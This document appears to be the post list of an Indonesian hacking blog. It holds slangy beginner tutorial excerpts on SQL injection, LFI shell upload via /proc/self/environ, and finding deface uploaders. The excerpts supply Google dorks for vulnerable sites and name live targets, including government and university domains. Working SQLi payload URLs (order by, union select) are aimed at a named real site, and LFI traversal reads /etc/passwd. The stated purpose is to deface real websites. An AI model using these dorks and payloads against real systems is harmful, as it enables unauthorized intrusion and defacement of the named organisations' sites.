Postingan

Apa yang dimaksud dengan sqli dan bagaimana cara melakukan sqli

Gambar
  Halo Exploiter kali ini gw akan menjelaskan apa itu sqli Oke jangan lama lama langsung saja penjelasan nya Nah, SQLi atau SQL injection adalah  serangan yang dilakukan dengan menginjeksi atau “menyuntikkan” kode berbahaya dalam bentuk pernyataan SQL ke dalam aplikasi web . Kode ini digunakan hacker untuk mengakses data dalam database atau bahkan mengacaukannya Ya seperti itu lah sqli ygy Dan bagi kalian yang penasaran bagaimana bentuk serangan sqli ini dan ini fotonya Seperti itu ygy Untuk kalian yang ingin belajar sqli bisa memencet link dibawah ini Sqli di chrome Klik Disini Sqli di dh hackbar Klik Oke sekian penjelasan sqli dari saya untuk tutorial atau informasi lainya tunggu saja saya akan segera mengupload nya

Cara sqli method lokomedia

Gambar
  YO HALO HEKER  YA BERTEMU LAGI DENGAN SAYA  ./FreedomXploit YA KALI INI SAYA AKAN MEMBAGIKAN TUORIAL SQLI LOKOMEDIA Yo gausah basa basi Lgsung ae ke tutorial nya Bahan -Dork -Hp/komputer-pc -internet -rokok kopi -cewek biar pool -dh hackbar Yang pertama Tama ya kalian harus ngedork dahulu Bisa kalian search di chrome,yandex, google Ya pokoknya gitu lah Dork -inurl:statis-1-profil.html -inurl:statis-2-profil.html -inurl:statis-3-strukturorganisasi.html -intext:lokomedia inurl:statis- ext:html -intext:lokomedia inurl:kategori- 6 - .html -intext:lokomedia inurl:semua- ext:html -inurl:kategori-32-daerah.html site:.com -intext:copyright by inurl:statis-1 ext:html -intext:lokomedia inurl:statis- ext:html -intext:lokomedia inurl:semua- ext:html Karena gw udah dapet target jadi langsung ae kita eksekusi Live target:https://bkpsdm.sukabumikab.go.id/ Oke langsung aja kita eksekusi  Karena di website nya gaada paramnya Kita tinggal cari yang belakang nya .html Atau ada ini n...

LFI up Shell dengan metode Proc/self/enfiron

Gambar
  Yow halo exploiter kali ini saya akan membagikan cara deface Local File Inclusion ( LFI ) upload shell dengan metode Proc/Self/Environ. ok tanpa basa basi langsung saja kita mulai :b. sebelumnya kalian harus memiliki target yang vulnerable terhadap serangan LFI Dork :  inurl:".php?id=contact.php" inurl:index.php?id=contact.php ( selanjutnya akalin sendiri :b ) Contoh :  http://target.com/page.php?id=service.php Kemudian ganti  service.php  dengan  ../../../  lalu jika kalian mendapat error seperti : Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/service.php on line 99 kemungkinan kita mendapat kesempatan untuk memanfaatkan include ke file lain. selanjutanya kita coba temukan /etc/passwd. contoh :  http://target.com/page.php?id=etc/passwd tetapi jika masih mendapatkan error kurang lebih sperti ini : Warning: include(/etc/passwd) [function.include]: failed to open st...

CARA SQLI DENGAN DH HACKBAR UNTUK PEMULA

Gambar
  Halo ker apa kabarnya baik pastinya Awgawgawg Baiklah kaga usah Basa basi langsung aja ke tutorialnya Baiklah bahan bahan yang di butuhkan Bahan bahan -apk dh -web vuln sqli -dios yang pasti nya -bh janda canda awgawgawg  >_< -rokok ama kopi biar mantep -komputer, laptop, atau hp Baiklah langsung saja ke tutorialnya apk dh cukup kalian download di google buat aja dh hackbar nah udah Karena gw udah punya web vuln nya ni gw kasih target nya di bawah Live Target: https://www.tsu.ac.th/ Baik lah ini tampilan awal dh hackbar Nah itu tampilan utama dh Hackbar Kan tadi di atas gw ngasih target tanpa Pram untuk mencari Pram cukup di chrome browser Caranya  Buka chrome trusss  Buat  Site:https://www.tsu.ac.th/ php?id= Nah gitu terkadang ada website yang kaga ada pramnya klo di cari kek gitu Tinggal di search aja di chrome atau browser di yandex juga bisa awgawgawg Klo udah di search nanti jadi gini Nah kalian pilih aja bagi kalian klo di kasih ' klo vuln ya kalia...

CARA SQLI DENGAN MUDAH

Gambar
YOYO THE FUCK Halo lammer apa kabarnya baik pasti nya sakit  Ga canda awgawg Nah kali ini gw bakalan ngasih tau cara sqli biar kalian ga susah payah pass di ajak war sqli  tinggal bales aja skill mentok sqli aja bangga nah pasti baperan dia awgawg  Ok langsung saja bahan bahan nya -Target vuln -kopi rokok biar mantep -cewek kalo punya -kutang janda:v Target live: https://kansascitynova.org/news.php?id=42 Nah langsung aja ke tutorial nya  Pertama tama cek dulu vuln oa kagak tinggal tambahin ' nah mudah kan Contoh: https://kansascitynova.org/news.php?id=42' Kalo vuln ada bacaan error sql syntaq syntaq gituuu yaa  Langsung saja ke tahap ke2 https://kansascitynova.org/news.php?id=42'+order+by+1--+- https://kansascitynova.org/news.php?id=42'+order+by+2--+- Seterusnya sampe 100 aja boleh kalo error Sampai error  Tahap ke 3 Kita cari togel nya oke https://kansascitynova.org/news.php?id=-42'+union+select+1,2,3,4,5,6,7--+- Error nya sampe 7 nah buat sepe...

1.CARA MENEMUKAN UPLADER DEFACE

Gambar
Halo newbie apa kabar nya  Disini w akan memberikan tutorial maling  Bh janda Eits canda kali gw akan memberikan tutorial cara mencari uploader deface buat pansos ke temen temen klen Bahan bahan: -hp/laptop/komputer -rokok biar mantep -internet -dork -dan bh janda awkwkwk Disini kita akan menggunakan dork nya Dork: intitle:uploader by Nah itu dork nya ok langsung saja kita cari lewat crhome gogle ama browser bisa yak temen temen ku yang ku sayang mmmmuah Ok langsung kita search dork nya  nah seperti itu tampilan nya ya temen temen Langsung aja pilih yang mana yang penting bisa yak Ok disini gw milih yang paling atas yak  Ini bentuk setelah kalin klik ok langsung aja kalian akses file deface kalian ya berbentuk html Ok nanti untuk hasilnya bisa kalian klik hasil bacanya ada di bawah Ok Cukup sampai disini  sampai ketemu lagi di Next tutorial